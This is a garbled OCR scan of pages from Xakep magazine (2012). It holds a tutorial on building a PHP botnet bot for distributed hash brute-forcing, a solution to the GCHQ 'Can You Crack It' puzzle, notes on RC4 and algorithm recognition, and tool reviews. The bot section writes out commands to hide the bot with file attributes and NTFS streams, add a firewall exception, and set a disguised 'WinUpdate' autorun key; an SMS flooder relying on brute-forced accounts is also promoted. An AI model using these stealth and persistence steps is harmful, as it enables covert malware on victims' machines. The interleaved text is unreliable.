вращать исключительно уникальные словари, чтобы у каждой

if (!file_exists( './vocabulary.txt' ))

машины был свой <<с ловарный запас>>. Также стои т оставить возможно сть менять словарь с помощью команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь же нам необходимо накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи не позволяет привести

компилим

здесь код этой функции полностью, поэтому укажу лишь ее кейсы

!полный код ищи на нашем диске):

Теперь, когда мы объединили всё это в один файл, перед нами

Ьгutе-брут;

встает задача создать из него полноценный ехе. В этом нам по­

сlеап- очистка данных , полученны х в результате предыдущих

может небольшая тулза с длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет собой билдер, который создает ехе из РНР­

фай ла. Билдер за всё время его использования ни разу не подво­

ехit-выход.

дил, работал отлично, без всяки х ба го в !респект авторам!). Этот билдер позволяет компи лить экзешники как для РНР

По дефолту шедулер находи тс я в режиме ожидания команд . В качестве тайм-аута мы указали

300

4.0, так

и для

более новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

интервал обращения б ото в к нашему серверу. Далее идет запуск

ляция в

Bambalam

выглядит вот так:

команд с учетом данных , переданных сервером боту, причем по­

сле выполнения команды мы делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

1

РНР

bl

DeveiStudio

M<~miS4r

Однозначный лидер

2

Php2exe tmJylyi'{4Y_R

3

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

5

Peri2Exe Ьit.ly/y29qШ

Преобразует исходный

Более мощный инструмент,

Позволяет компилировать

по конвертированию РНР­

код на РНР в исnолняемый

не имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса и позволяющий

на Питоне, в экзешники.

Создает независимый исполняемый файл ,

GUI-

Отличный инструмент для

nрограммы . Тут

nриложемне могло

па ковать прямо в консоли .

Помимо исполняемого

и визуальная среда

запуститься, в той же

Также комnилирует целые

файла, создаетнесколько

который работает в любых

программирования,

директории должна

проекты с исnользованием

библиотек, помогающих

системах и не требует

и отладка кода,

иметься библиотека

различных библиотек,

готовой программе

интерпретатора .

и подключение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей и многое другое .

ХАКЕР

03/158/2012


РНР-бот для

Windows

Сервис cmdS.ru предлагает Вам средства проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша компания занимается вопросами компьютерной безопасности с 2006 года. База данных самая большая в мире

и на сегодняшний день содержит около

4,800,000,000,000 записей, 95% 50 Терабайт•

данных распределен по кластеру и составляет

Пожалуйста Зарегистрируйтесь или Автошчуйтесь

.

-

....

из которых уникальны. Суммарный объем

. . -;. ·-f.,~ Сервис на базе распределенных вычислений для расшифровки МD5-хешей

Итак, бот готов. Теперь займемся сервером. Во-первых, нужно зафиксировать в базе те боты, которые успешно отстучали нам

проходит по всем файлам в папке гesults, поочередно открывает их и добавляет в базу.

х отя бы один раз, то есть, так сказать, установленные боты. Для

этого выполняется проверка IР-адресов в базе [можно присвоить специальный идентификатор каждой машине, который она будет

ХАКЕРСКИЕ ФИЧИ Теперь перейдем к оптимизации нашего самопального комплекса .

передавать каждый раз, чтобы различить между собой ха сты,

Во-первых , брутер, бот и библиотеку можно запаковать в один

находящиеся за NAT), после чего в базу добавляются те адреса,

экзешник, причем так, что процесс функционирования бота станет

которые не были в ней найдены. Их можно выводить в панели

невидимым, то есть консоли не будет видно.

управления ботами. Но на тот случай, если бот уже брутит и немо­

Для этого можно nрибегнуть к подручным средствам, а именно

жет отстучать, что он живой, можно также сделать в таблице

со с тавить батник следующего содержания:

столбец

нужно с качать софтин к у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 и скомпилировать

когда бот отстучал в nоследний раз. Таким образом, при каждом

в ней этот батник, предварительно указав в настройках invisiЫe

обращении к серверу зто значение обновляется.

application и выбрав на вкладке include три файла: bot .exe, теку [php5ts.dll) и сам консольный брутер [md5.exe).

Если оно больше 300 [дефолтный пятиминутный интервал отстукивания бота), то это значит, что бот работает или находится

библио­

Программка создаст один файл, работающий в фоновом режи­

в офлайне. Затем нужно создать генератор конфигов. Конфиг, как

ме . Затем можно сделать так, чтобы скрывались и сами файлы . Для

ты, возможно, заметил по вышеприведенным кускам кода, состо­

этого есть несколько способов. Один из них- это, например, про­

ит из двух частей, объединенных знаком

1.

стое использование штатной виндавай софтины attгib с флагами

Первая часть отвечает за команду, которую nолучает бота,

'+h ' и '+s'. При мер:

а вторая- за дополнительные данные, нужные для исnолнения

этой команды. Чтобы дать команду на установку, мы должны

attrib "%CD%\bot.exe" +h +s

отправить что-то вроде iпstalllvocab_123123123.txt, где iпstall­ этo команда установки бота, а

vocab_123123123 .txt-

это файл

словаря, который надо установить. Мы также можем очистить все

Такая команда скроет и сделает системным наш файл бота. Спрятать файл в потоках

NTFS

немного сложнее:

рабочие файлы, просто удалив их,- для этого достаточно по­ слать команду

clean.

Ну и самая главная команда- это bгute.

Второй параметр этой команды объединяет хеш и для б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

с помощью двоеточия:

Запуск при этом осуществляется тоже с помощью батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются на ПР-сервер, который находится там же, где и центр управления . Попадает всё это дело в папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш файл в том числе загружает результаты на FТР. Файервол

Windows

может на это ругаться , поэтому попробуем его обойти:

гesults. Для того чтобы добавить в базу готовые результаты, бот <<дер­

гает» скрипт с передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 2>&1 ' ); Авторан для нашего ехе [если он лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 2>&1' ); ЗАКЛЮЧЕНИЕ В РНР предостаточно функций, предназначенных для создания нехи­ лого файлового менеджера или же простого системного помощника . Я надеюсь, что благодаря моей статье ты убедился не только в этом, но также и в том, что для автоматизации процесса суще­

ствует множество различных средств , которые при совместном

Рабочий бот

ХАКЕР

03/158/20 12

использовании могут сильно тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной связи

Великобритании объявило небольшой

Н-конкурс, чтобы привлечь к себе внимание к а к к работодателю . Не уверен, что к ним кто­ то устроился на работу, но пройт и задания из

На нашем диске ты смож ешь найти видео с полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса наверняка захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 3-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 58.. 1.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... в :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 7...:... ".. } .D.r..../14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 7.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 4M .....f{... Sv; .. (... 8.H.&'.}}y.j....... 1.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 4. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий к файлу с заданием

ХАКЕР

03/158/2012


1

Итак, некоторое время назад Управление

адрес конца наш е го кода, указываю щи й, где

void

правительовенной связи Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное про хож д ение

из стека из влека ется

DWORO,

нивается с ОхАААААААА. Затем извлекается

свое резюме, а затем и устроиться на работу

е ще о дн о з начени е, ко тор ое срав нив ае т ся

в брита н скую киберразве д ку . Пр едложе нны е

с О х ВВВВВВВВ . Однако этого куска дан ных

за дания н е так уж сложны, д а и саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо дим о сохранить кар тин ку с за­

сразу обнаружи ть при п омо щи пои сков и к а

дани е м с сай та и п осмо треть , как эта функция

Google,

однако этот конкурс всё же интере­

сен , так как он позволяет оценить у ровень

под г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся по

iTXt РNG-файла с за ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы с п омо щью алгоритма Base64 и следуют за сло в ом Comment !смотри рисунок].

}

Раскодировав и склеив дв а бинарника, я за­

v1 v2 do

ния, который представляет собой следующую

ствующий рисунок] и надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

поначалу подумал, что это за шифрованное по­

GET

/ 15b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

однако у меня

ничего не вышло. В итоге я решил засунуть все

НЕХ-значения с рисунка в двоичный фай л и открыть полученное непотребство в

IDA

Рг о . В

После от п равки соот в е т ствующе г о

GET-

зanpoca н а сервер получаем второе за дан ие.

Кстати, ко д можно запус тить нескольки­ ми с п особами. Я создал простой ехе -фа йл, в котором сначала считывается кусок кода с

таты.

за да нием, а пот ом всё э т о д ело запускается на

распознал осмысленные куски

кода для архитектуры х86 . Я п о нял , ч т о выбрал

выполнение ! п од ко н тро л ем

правильный п у ть.

простой ассемблерной вставки:

IDA] при пом ощ и

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля этого не нужно знать формат

PNG,

а достаточно просто быть внимательным !не­

Недолго думая , я преобразовал пол уче н­ ный кусок кода в функцию и запустил д еком­

=

l~hile

итоге мне удалось пол учить кое-какие рез ул ь­

IDA легко

( (_BYTE ) vO ); о;

}

НТТР / 1 . 1

мости каждого зна чения и попытался затем

перевести их в символы

1;

LOBYTE ( v1 ) = v2 + v4[ v0 ] v2 = ROR __ ( v2 , 8); v3 = v4[ v1 ]; v4 [ v1 ] = v4[ v0]; v4[ vO ] = vз ; lOBYTE ( vO ) = vO + 1;

Уви д е в эти Н ЕХ-значения, я

слание, начал было считать частоту встречае­

+

{

пустил код на выполнение !под отладчиком] и пр осмотрел рез ультат пр о ц е д уры дешифрова­

You

v4[ v0 ] = vO ; lOBYTE ( vO ) = vO

ус тро е на . Недостающие д анные со держатся в

с набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , мы видим картинку

cdecl sub_O()

vo do

Чтобы найти вторую половин у стека нашей

овенной связи IGCHQJ можно пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

который срав­

которого п оз воляло отправить в У правление

с ап сгасk

обходима я информация со держится в самом

начале файла].

_ asm

пилятор. Сначала в стеке вы деля ется место под массив в

256

байт, который заполняется

значениями от О до

255,

а дале е вып о лняется

проце д у ра преобразования массива, которая

int 3;

mov call

SECOND STEP

nрограммная точка останова

еах,

еах;

array; ar ray -

массив

с

кодом

заnус к к ода на выnол нение

попробовать написать эмулятор микро­ nроцессора . Дан кусок памяти с кодом и

на са мом д еле пре д с т авляет собой алгоритм

инициализации шифра RC4 с ра зме ром блока 8 бит и к люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а также описана архитектура

Хочу отме т ить, что в начале кода прои схо ­

микропроцессора, для которого вс ё это

После всего этого вызывается еще одна функ­

дит jmp через четыре !вроде бы] неиспользуе­

предназначено . Процес сор состоит из

ция, стек которой испорчен, и поэтом у о н а не

мых байта. Э ти четыре байта пр иго дя тся нам в

по зубам декомпилятору.

дальн ейшем. Как видишь, первое задание до­

восьми регистров, четыре из которых !гО ... гЗ] представляют собой регистры общего на­

вольно про с тое. Затруднения возникли лишь

значения, два предназначены для хра нения

Как оказалось, в начале второй функ­ ции значение регистра

esp,

содержащего

указа тель на вершину стека, меняется на

при об нар уже нии второй части с тека функции

адреса сегме нта кода и а др еса сегмента

в дополнительной секции РNG -файла с зада-

данны х ics и ds соо тв е т ственно], о д ин ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 2 ) (

uS • ( FILE • ) f ope n6 4("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

2Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt в операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 1;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 2 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 6 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 1;

*ni x

полученный блок шифрованного текста вновь

DES

служит для хеширования различных данных,

шифруется с помощью алгоритма

в том числе паралей пользователей системы.

Таким образом , блок из восьми нулевых байт

и т. д.

Традиционная реализация этой функции

шифруется в nроцессеработы

использует американский алгоритм

отметить, что сгурt не использует стандартную,

DES (Data

25

раз . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается до восьми символов, от каждого

Алгоритм каждый раз слегка меняется . Его

из которых, в свою очередь, берется

конкретная реализация зависит от соли длиной

7 бит. 7 бит формируют 56-битный DES, при помощи которого

DES.

Восемь наборов по

12

ключ алгоритма

nреобразуются в строку при помощи алгоритма

шифруется блок из восьми нулевых байт . Затем

бит. Соль и шифрованный текст в итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 158/ 2012

067


взлом

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

1

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

100h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- поздравление с успешным

Неиспользованные значения из первого и второго заданий

гистр служит для хранения флага операции

[flgl, и один- для хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором из

описании задания упоминается регистр cs, так же как и г51. Второй подводный камень -реализация fаг jump'oв и изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь просто надо знать, что значения ре­

восьми инструкций, каждая из которых [за

гистров, отвечающих за номера сегментов,

Отсылая очередной GЕТ-запрос к сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются только при дальних переходах и

чаем третье за дани е - исполняемый файл. При

щей выполнение программыl имеет два

не изменяются, если ip начинает указывать

просмотре зависимостей это го файла видно,

режима работы: mod О и mod 1. В принципе,

на новый сегмент кода . В остальном же всё

что для его работы необходим Cygwiп. Вообще,

для успешного выполнения задания до­

просто и прозрачно. Разработчики заданий

в свойствах полученной программы указано,

статочно обладать небольшими навыками

предлагают нам реализовать эмулятор на

что настоящее имя зкзешника keygeп.exe, так

программирования, а также представлять,

языке JavaScгipt, однако на то, будет ли

что смело переименовываем его.

как рабо т ают микропроцессоры. Однако в

учтено выполненное задание, выбор языка

процессе программирования я наткнулся

программирования не влияет. Я реализо­

сом- код никак не обфусцирован. При за пу­

В этот раз опять никаких пр облем с ревер­

на несколько подводных камней. Сперва я

вал эмулятор процессара на С. Программа

ске keygeп требует передать ему URL сайта для

объединил в один массив регистры общего

выполняется довольно быстро, хотя у меня

соединения в качестве первого пара метра. Ал­

назначения, а для cs и ds выделил отдель­

были подозрения, что разработчики напи­

горитм работы программы достаточно прост: в

ные переменные. Как оказалось, зто оши­

шут код, который будет работать полчаса :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, так как в коде встречаются

инструкции типа «add г[5], 12>>, которые, по

После остановки процессара [выполнения инструкции hltl в памяти появится ключ к

также три числа. Судя по строкам в се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - очередной GЕТ­

данных, требуемые числа представляют собой

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key и Stage two liceпce key,

licence .txt, из которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В настоящее время сложно найти

<<заnо дозрить >> тот или иной участок кода в

коммуникационную систему, которая не

nринадлежности к какому-либо алгоритму .

ISBo x' ыl, некоторые специфические константы,

использовала бы криnтографию. Часто в

Так, например, современные симметричные

а также такие nараметры алгоритма, как длина

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования обычно

ключей [в том числе длина массива раундовых

модулей необ х одимо распознавать

построеныпоитерационной схеме, в которой,

ключей!, длина блока, количество итераций

и восстанавливать используемые

как правило, производится замена значений в

[раундов! и т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей в памяти ,

также обладают и хеш -фун кции. Алгоритмы

работы, nорядок выработки и использования

нало жение ключа шифрования и линейное

хеширования обычно исnользуют большие

ключей шифрования и т. д. Разбор конкретной

преобразование . При этом в пределах одной

наборы констант, что облегчает распознавание

реализации алгоритма такженередко

функции в ассемблернам листинге может

типа алгоритма и его восстановление .

позволяет не только выявить ее ошибки, но

встретиться цикл, большое количество

Стоит отметить, что в подавляющем

и оnределить, что алгоритм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, в результате чего могут

и т. д ., а также частые обращения к nамяти [в

симметричных алгоритмов шифрования

возникать уязвимости, nозволяющие в

качестве nримера смотри рисунок!.

функция выработки массива раундовых ключей

конечном итоге nровести усnешную атаку на

Кроме того, для каждого криптографического

lkey schedulel и функция дешифрования/

систему в целом.

алгоритма можно выделить некоторые

шифрования открытого текста находятся в

Вообще, универсального рецеnта по

<< отличительные черты >> , которые позволяют

разных участках кода программы . Это помогает

распознаванию криптографических

автоматизировать поиск необ х одимых

ускорить nроцесс обработки информации (и

алгоритмов не существует, можно лишь

участков кода. Чаще всего такими признаками

не тратить каждый раз время и ресурсы на

выделить некоторые nодходы и оnисать

служат константы, х арактерные для того

nолучение

некоторые nризнаки , которые позволяют

или иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов это могут быть блоки подстановак

key shedule

из основного ключа

ХАКЕР

03/158/ 2012


1са п cra ck it l

Ито г о в ый GЕТ-за пр ос к се р ве р у и м еет

то есть это неко т о р ые д ан н ые, дл я n олучения

которых необходимо решить за д ачи , п ре д ла­

с л едую щ ий в и д :

АЛГОРИТМ

гаемые на первом и втором этапах конкурса.

Прочитанная из файла строка nреобразуется

при nомощи функции crypt [из Cygwin ) и срав­

RC4

GET / hqDT K 7 b8K2rvw/ A ЗBf C 2A F /D2 AB1F e5/ DA1 3F1 1e/key.txt НТ Т Р / 1. е Алгоритм

нивается с э т алон н ым з н а ч е н ием из сегмен т а

данных программы. Д ойдя д о э т ого эта n а, я

Этот запрос позволяет просмотреть файл

[также изве с тен как

ARC4)

на

уж было nриня-лся ломать хеш из сегмента

key.txt,

данных, однако э т о был тупиков ы й п уть, и в сё

с п оз д равлением

оказа л ось гораз д о n р о щ е. Н еобхо д имый IР ­

на оп исание вакансии, в ко т о р ом говори т ся,

Ривесто м , одним из основателей компании

адрес получается с использованием перво г о

что конкурсанту, успешно выполнившему все

R5A

nараметра программы [UR L сервера) и DNS.

за д ания, отнюдь не предлагают работу прямо

ладает рядо м до с тоинств , к которым в первую

Как несложно д ога д аться,

UR L д олжен

п ред­

в котором указан ключ от страни ц ы

RC4

сегодняшни й де н ь является одним из самых

<<So you did it» и ссы л кой

известных и широко используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, в далеком

1987

году .

RC4

об­

сейчас, н о согласны рассмотреть его канди­

очер е дь относят с я высокая скорость работы

став пят ь собой а др ес страницы с за да ни ями:

да т у р у п озже, когд а в У п равлении п оявятся

и п е ре м енная длина ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует к удаленному серверу G ЕТ- запрос вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 1 .е

Как я уnоминал ранее, на месте строки в за­

8 бит

псевдослу ­

ча йн о й по с ледовательно с ти и изменяет с вое вн у треннее с остояние , к оторое определяется

З ад анияотУправления п равительствен -

перестанов к ой значений от О до

ной связи Великобритании не представля-

дву м я однобайт н ыми инде к сами:

255 [5) и i и j. Алго­

ют никак ой сложности и в первую очередь

рит м

просе стоит хеш-з н ачение из сегмента данных .

ориентированы на проверку смекалки, а уже

инициализаци и [К5А) и алгоритма выработки

Остае т ся лишь най т и значения <<ли ц ензионных

потом - навыков реверс-инжинирин г а и про­

псевдослуча й но й последовательности . Про­

ключеЙ>> п ервого и второ г о э т апов за д аний,

граммирования и знаний о принципах рабо т ы

цедура инициализации служит для выработ­

для чего я начал собирать данные, которые

микропроцессоров. Выполнить эти задания под

к и п е р е становки

на этих этапах не использовались. На первом

силу любому человеку, у которого достаточно

от

этапе это четыре байта в начале кода, через

терпения и энтузиазма. Это косвенно свиде­

псевдо к одом :

котор ы е ш ел п ер в о н ачал ь н ы й

тельс т вует о том, ч то в

jump. Дл я

40

RC4

до

состоит из дву х частей : процедуры

256

5

при помощи к люча длиной

бит. К5А описывается с ледующим

GC HQ работают обычные

второ г о этапа это нигде не пригодившееся два

люди ,

ОWОRО-значения firmware [смотри рисунок).

которые в зрелищных голливудских фильмах

Вообще, во втором задании не использовался

взламывают парали за пару минут и с легкостью

весь третий ба н к памяти, кото ры й на ч и н ае т ся

п ро н икают в за щ ищенные сети правите ль с т а

j

с сигна т уры

разных стран. Н апоследок хочется побла г о­

f or i f r om е t o 255 j := (j + S[ i ] + key[i mod keylength] ) mod 256 swap va lu es of S[i] and S[j] _ endfor

7z,

о дн ако не я вл яе т ся о д ноимен­

everyday heroes, а

не те супермены,

ным архивом. Этот учас т ок, не потребовавший­

дарить британцев за еще одну возмож н ость

ся для выполнения задания, видимо , нужен

<<размяться» и проверить свои знания . За д ания

прос т о д ля того, ч т обы за п ута т ь конкурса н то в .

наших спецслужб были бы куда хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 100221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 1 00221136 • text :1 0022А38 • text: 1 00221138 • text: 1 002211ЗЕ • text: 1 012211..5 • text :1002211 ..7 • text: 1 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 1 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 100221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 10122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 1Ch ) есх. esi есх • 10h 1 edx. cl есх. ds:byte_10058188[edx) есх. 8 edx • esi edx. 8 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 1Ch ] edx. ds:ьyte_10058188[edx] есх. 8 есх. edx edi. (eax+ OCh ) есх. 8 edx. esi edx. 18h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 4 ]

есх.

(еах]

add

еьр.

4

XOI" ROU ROU XOI"

edx. есх (eax+ 20h ].

f or i f r om е to 255 S[ i] : = i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности также достаточно прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i := ( i + 1) mod 256 j : = (j + S[ i ] ) mod 256 swap valu es of S[i] апd S[jJ _ К : = S[(S[i] + S[j] ) mod 2;>6] output К endwh i l e Алгоритм

RC4

применяется для шифрования

данных в протоколе

55L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

в

когда неправильное исnользование данного

алгоритма позволяло вос с тановить конфи­

денциальную информацию . Так, некоторое время назад для защиты содержимого

РDF-документов применялея ключа

есх

40

Х АКЕР

03/158/2012

AES

с длиной

ленник мог получить доступ к содержимому

есх.

(еах• 8 ]

файла простым перебором ключа . В одной

есх.

edx

из версий М5

Office RC4

исnользования Кусо к ассе м блерного листин г а алгоритма

RC4

бит, в результате чего злоумыш ­

из-за неправильного для защиты файлов для

во с становления и х содержимого х ватало

069



,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

о

43

00000004 Ноемо бозо .-.кoe.rndЬ Количеста о кееа.:

Оwт

49

Услоои• обробо""' r:t>

12

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

2898K8i5

Ф,,".,

1021 44

Mys..o

~

120~1

1•

122988

ТВ

1-4е<IОЭ

....

tфт

1~0

приема у квалифицированного специалиста.

Поиск по базе:

+

с==_

искать

Вы nоnали на самый крупный файловый поисковик в рунете . Ищите любые файлы и скачивайте на неограниченной скорости с самых больших торрент-трекеров

Попупярные запросы :

сайт << Проверка зрения через интернет». Он, естественно, был очень хорошо

IV сауз парк хаус интерны wow аватар кас пере кий патч 2010 GTA Starcraft 2 рок ПрОГраММЫ dVd 2QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

о чудо'- это оказалось именно то, что нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон баста

Конечно, Ваня испугался, а у страха, как из­ вестно, глаза велики. Ваня ткнул первую же

daemon total

pdf клиника фильмы HQ пипец windows 7 HD 720р с качать dvdrip качество Весёлая ферма house КаМеДИ

оформлен и, что самое главное, предлагал проверить зрение уже сейчас' Ваня быстро нажал «Пройти проверку» и ответил на во­ просы анкеты, которые якобы должны были выявить, что же всё-таки случилось с его

глазами. Когда Ваня ответил на все вопросы, сайт сообщил ему, что постановка диагноза, вообще-то, платная, но стоит недорого и что

Ложный

072

depo si tfiles

для его получения необходимо ввести свой

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю создание adult платников . в услугу входит : -Установка движка платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне к бнллннrу

А ТliКЖе прогон по каталоrlllм©''


взлом

Marlicq 884888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 5Lk8n.

--

._ ......

РЕ

Tools- это

с

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

1pscanner.

Windows .

та для работы с файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал в своей по ­

П ро га представляет собой про д винутый SМS­

вседне в ной работе

флуд ер, позво л яющий рассылать сообщения

Radmin,

то советую тебе

включает в себя следующие мо дули : редактор

попробо в ать в деле еще одну программу о т тех

с любым текстом . Д лина о д ного СМС стандар­

РЕ- файлов,

же авторов -

тна и составляет около

Task

Vieweг, оп т имизатор

Win32

Advanced

1

Р Scanne г. Как яс н о

75

сим в олов на кирил­

Р Е -файлов, д етек т ор компи л я т ора/у п аковщика

из названия, п ро га n редставляе т собой п р о ­

лице и

и м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый сетевой сканер .

живается отп ра вка С М С в т акие страны, как

г раммы просто п оражаю т в оображе ни е.

Функционал и основные достоинства тулзы:

Р оссия, Казахста н , Узбек и с т а н , Украина. Дл я

1.

работы флудера т ребуются ва ли д ные аккаунты

создание дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро в а н ие со т ен

Maii. Ru.

Regionl;

ком п ьютеров в сети, чтобы найти такие ре ­

таких аккаунтов. Ты в п ол н е сможешь найти

сурсы, как общие папки, Н ТТ Р, НТТ РS и FТР,

раздачи с ними, заре г истриро в ать аккаунты

и получитьдоступ к ним.

самостоятельно или же вос п ользоваться од­

Интеграция с

ним из многих nубличных брутфорсеров этого

завершение работ ы процесса;

